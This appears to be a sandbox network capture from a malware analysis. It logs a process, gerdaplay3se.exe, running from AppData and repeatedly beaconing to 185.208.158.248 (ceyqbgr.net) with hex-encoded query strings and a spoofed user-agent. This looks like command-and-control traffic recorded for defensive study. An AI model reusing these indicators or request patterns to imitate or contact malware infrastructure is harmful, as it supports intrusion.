Sep 27, 2024 17:32:36.593708038 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	57561	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:36.715512991 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:37.422297955 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	57562	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:37.544811964 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:38.261061907 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	57563	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:38.579432011 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:39.289077997 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	57564	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:39.417458057 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:40.123241901 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	57565	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:40.246184111 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:40.924777031 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	57566	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:41.173532009 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:41.880575895 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:41.990983963 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:42.250861883 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	57567	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:42.370582104 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:43.068851948 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:43.177799940 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:43.421175957 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	57568	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:43.542486906 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:47.253375053 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:47.366082907 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:47.601715088 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:47.710699081 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:47.946191072 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	57570	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:48.074552059 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:48.796789885 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	57571	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:48.917807102 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:49.613887072 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:49.726095915 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:49.962387085 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	57572	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:50.091181993 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:50.807029009 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	57573	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:50.935319901 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:51.669373989 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	57574	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:51.792768002 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:52.719605923 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	57575	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:52.849694967 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:53.621285915 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	57576	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:53.750183105 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:54.453270912 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	57577	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:54.574004889 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:55.379906893 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	57578	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:55.497025967 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:56.275300026 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	57579	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:56.431134939 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:57.201956987 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	57580	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:57.326319933 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:58.046159029 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	57581	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:58.169636965 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:58.953360081 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	57582	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:59.111211061 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:59.949852943 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	57583	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:33:00.078115940 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
